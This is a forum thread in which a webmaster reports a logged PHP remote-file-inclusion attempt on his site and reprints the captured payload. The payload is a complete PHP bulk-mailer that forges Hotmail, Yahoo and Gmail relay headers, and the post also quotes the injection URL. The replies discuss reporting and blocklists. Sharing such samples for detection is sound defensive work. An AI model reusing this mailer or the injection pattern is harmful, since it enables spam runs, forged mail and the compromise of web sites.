Sign in to follow this  
Followers 0
T-Qualizer.com

Server side reporting tool for hacking attempts in realtime

8 posts in this topic

On my websites, I'm running a small detection tool for php-code injections. It automatically donwloads the file, the hacker tries to include.

Below I show you a real example from my log files and the downloaded spammer tool. This stuff makes clear where the increased spamruns of the last time come from.

My suggestion is to offer my detection tool as an opensource project and expand it to a realtime reporting tool that's able to report this attempts straight to SpamCop. Off course this requires also a SpamCop-side tool to recieve them. As opensource project it may be expanded to a complete honeypot to detect and eleminate spamruns before they have done their job.

Here is a example of a nice hacker spam action, real happend and logged from my website. Nothing is faked or changed.

Requested URL on 2009-12-29 at 21:56 gmt, from IP [82.155.84.123] (bl6-84-123.dsl.telepac.pt):

www.t-qualizer.eu/index.php?sessid=y1ufj9funveq5dw50l〈=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

You can see that the hacker tried to include a url in the hope that it will be executed.

Here comes the scri_pt, downloaded by my detection tool from:

www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt?

At the time I'm writing this post, 11 day's later, it's still online!

<html>
<head>
<title>35437282898562626475892888</title>
<style type="text/css">
<!--
.cxtexto {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 9px;
	border: thin #000000;
	background-color: #FFFFFF;
	color: #000000;
}
-->
</style>
</head>
</div>
		<table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1">
		  <form name="form1" method="post" action="" enctype="multipart/form-data">
		  <input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3">
			<tr>
				<td colspan="4" valign="top">  </td>
				</tr>
			<tr>
				<td valign="top"> <div align="right">
					<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
					<strong>nome</strong></font></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				email</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td>
				</tr>
			<tr>
				<td valign="top" colspan="4" height="2"></td>
				</tr>
			<tr>
				<td valign="top"> <div align="right"><strong>
					<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
					assunto</font></strong></div>
				</td>
			<td valign="middle" bgcolor="#CCCCCC">   
			<input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="60"></td>
			<td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">
				lista</font></strong></div></td>
			<td valign="middle" bgcolor="#CCCCCC" class="cxprocura">   <input name="emails" type="file" class="cxtexto" id="emails"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top" height="2"></td>
				</tr>
			<tr>
				<td colspan="2" valign="top"> <div align="center">
				<strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo 
				</strong></font>
				<input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3">
				<font size="1" face="Verdana, Arial, Helvetica, sans-serif">
				<strong>segundos</strong></font></div></td>
			<td colspan="2" valign="middle" bgcolor="#CCCCCC">  
		  <p align="center">  
		  <input type="submit" name="Submit2" value="enviar">  
		  <input name="Submit" type="button" onClick='window.close()' value="desistir"></td>
				</tr>
			<tr>
				<td colspan="4" valign="top"> 
				<p align="center"><strong>
				<font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td>
			</tr>
			<tr>
				<td colspan="4" align="center">
				<p align="center"> 
				<textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td>
			</tr>
			<tr>
				<td colspan="4" valign="top">
				 </td>
			</tr>
			 </form>
		</table>
<?php //Source PHP

//Para melhor 'debuging'
//error_reporting(E_ALL);
[at]ignore_user_abort(TRUE);
error_reporting(0);
[at]set_time_limit(0);
ini_set("memory_limit", "-1");

//Verifica se os dados foram preenchidos
$teste = $_POST['teste'];
If ($teste == null) {
	exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/);
}

//Recupera os dados do FORM
$FromName = $_POST['NRemetente'];
$FromMail = $_POST['ERemetente'];
$Subject = $_POST['Assunto'];
$MailServer = explode("[at]",$FromMail,2); $MailServer = $MailServer['1'];
$arq_name = $_FILES["emails"]["name"];
$arq_temp = $_FILES["emails"]["tmp_name"];
$Lista = (file($arq_temp));
$QtdMail = count($Lista);
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];
$ip = gethostbyname($MailServer);

//Arquivos de configuracao
[at]ini_set("sendmail_from", $FromMail);
[at]ini_set("time_limit",0);


//Define os headers do email
//	$headers  = "From: $FromName <$FromMail>\n";
//	$headers .= "MIME-Version: 1.0\n";
//	$headers .= "Content-type: text/html; charset=iso-8859-1\n";
//	$headers .= "Content-Transfer-encoding: 8bit\n";
//	$headers .= "Reply-To: $FromName <$FromMail>\n";
//	$headers .= "Return-Path: $FromMail\n";
//	$headers .= "Message-ID: <".md5(uniqid(time()))."[at]$MailServer>\n";
//	$headers .= "X-Priority: 3\n";
//	$headers .= "X-MSmail-Priority: High\n";
//	$headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n";
//	$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n";
//	$headers .= "X-Mailer: iGMail [www.ig.com.br]\n";
//	$headers .= "X-Originating-Email: [$FromName]\n";
//	$headers .= "X-Sender: $FromName\n";
//	$headers .= "X-Originating-IP: [201.201.120.121]\n";
//	$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n";


//Inicia o envio
If ($QtdMail <= 1) {
	exit;
} else {
	echo str_repeat("-", 126)."<br>";
	echo "<b>De:</b> $FromName <$FromMail><br>";
	echo "<b>Assunto:</b> $Subject<br>";
	echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>";
	echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>";
	echo str_repeat("-", 126)."<br>";
}

$error = 0;
$donen = 0;

while (list($pos, $val) = each($Lista)) {
	$val = trim($val);


	if (strstr(strtolower(htmlentities($val)), 'yahoo') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA GMAIL \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mta269.mail.re4.yahoo.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mta269.mail.re4.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mta269.mail.re4.yahoo.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''  &&   strstr(strtolower(htmlentities($val)), 'hotmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'live') == '')
	  {
		 //echo "\r\n ENTRA YAHOO \r\n";
		 $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }
	elseif (strstr(strtolower(htmlentities($val)), 'gmail') == ''   &&   strstr(strtolower(htmlentities($val)), 'yahoo') == '')
	  {
		 //echo "\r\n ENTRA HOTMAIL \r\n";
		 $ip1 = gethostbyname('mta269.mail.re4.yahoo.com');
		 $ip2 = gethostbyname('mail-fx0-f217.google.com');

		 $headers  = "X-Apparently-To:	 " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Return-Path:	 <" . $FromMail . ">\r\n";
		 $headers  .= "X-YMailISG:	 " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip1 . "]\r\n";
		 $headers  .= "Authentication-Results:	 mail-fx0-f217.google.com from=yahoo.com; domainkeys=neutral (no sig); from=yahoo.com; dkim=neutral (no sig)\r\n";
		 $headers  .= "Received:	 from " . $ip1 . " (EHLO mta269.mail.re4.yahoo.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Received:	 from BLU119-W27 ([" . $ip1 . "]) by mta269.mail.re4.yahoo.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n";
		 $headers  .= "Message-ID:	 <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n";
		 $headers  .= "Return-Path:	 " . $FromMail . "\r\n";
		 $headers  .= "Content-type: text/html; charset=iso-8859-1\r\n";
		 $headers  .= "X-Originating-IP:	 [" . $ip . "]\r\n";
		 $headers  .= "From:	 " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n";
		 $headers  .= "To:	 " . htmlentities($val) . "\r\n";
		 $headers  .= "Importance:	 Normal\r\n";
		 $headers  .= "MIME-Version:	 1.0\r\n";
		 $headers  .= "X-OriginalArrivalTime:	 " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n";
		 $headers  .= "Content-Length:	 " . trim(strlen($Conteudo)) . "\r\n";
	  }

	if (mail($val, $Subject, $Conteudo, $headers)) {
			$donen++;
			echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	} else {
			$error++;
			echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">';
	}

	$headers = "";

	echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>';
	sleep($IntervalX);
}

unlink($arq_temp);

?>

</body>
</html>

If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.

Share this post


Link to post
Share on other sites
My suggestion is to offer my detection tool as an opensource project and expand it to a realtime reporting tool that's able to report this attempts straight to SpamCop. Off course this requires also a SpamCop-side tool to recieve them. As opensource project it may be expanded to a complete honeypot to detect and eleminate spamruns before they have done their job.

I do not see any connecton to the core of the SpamCop mission and tool-set. Hacking of a web-site is nowhere near the 'sending spam e-mail" action. Moving this from the "New Feature Request" Forum section to the "Geek/Tech Things" Forum section with this Post.

At the time I'm writing this post, 11 day's later, it's still online!

Does one assume that you have this nifty detection tool, you've done this analysis and data capture but didn't report/complain about the actions and files involved to anyone? This would also forve one to ask why you Posted it all here in the first place, never mind that it has no relationship to what the SpamCop Parsing & Reporting system is all about ...???? Yes, I see that there is code there to try to send e-mail, but .... this would only happen after the succesful attack/exploit.

As your suggested exploit is geared towards Joomla (well, actually, what appears to be an exploited Joomla (using) site), I'd suggest you (and/or the site-owner) hit places such as http://secunia.com/advisories/product/ and check out the published advisories/warnings about exploit issues with that tool (I'd have offered up a more direct link, hut the Joomla+other looks prety extensive. Not in use here, so no idea whuch of those 'extensions' would be of interest in your case.)

On the other hand, are the redirscts on "your" site to mijndomein.nl some sort of indication that either your site has been hacked, or that there's simply some spamvertising involved here?

Share this post


Link to post
Share on other sites
On my websites, I'm running a small detection tool for php-code injections. It automatically donwloads the file, the hacker tries to include.

That looks very interesting, and I'd love to see the code. Could you mail me at deputies[at]spamcop.net, please? We would love to do more with malware detection.

Share this post


Link to post
Share on other sites

http://dnsbl.abuse.ch/

it is nice list of website attacking ips - the list does not have All current active web hacking ips - but it is a very nice list to augment an htaccess file once an hour. (or use via dnslook ups in real time from an apache module etc).

It seems similar to what you propose T-equalizer. but perhaps not as open as you indicate your propsed system would be.

What language is your coding in.

Share this post


Link to post
Share on other sites
If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.

Looks like SpamCop Admin is interested

http://forum.spamcop.net/forums/index.php?...ost&p=73722

The main strength in SpamCop is that it Automatically sends an "abuse" report to the listed owner of the IP

If you could do this also it would remove a lot of the trouble Bots cause

A very high percentage of ISP's do act responsibly to abuse reports and look into it.

Share this post


Link to post
Share on other sites
Looks like SpamCop Admin is interested

That is not "SpamCop Admin" .... I'd like to believe that the interest posted about was more 'personal' in nature, the Group icon being a bit of a distraction. However, I can't actually speak for her, and she basically doesn't talk to me.

Share this post


Link to post
Share on other sites

it is always personal/an insult when someone tries to hijack your resources/services?

Edited by QuantumMechanic

Share this post


Link to post
Share on other sites

All kind of academic. If I read correctly the the person started this thread and then disappeared.

Seems odd, put their work in the public domain, ask for interest/input. When there was some, poof.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0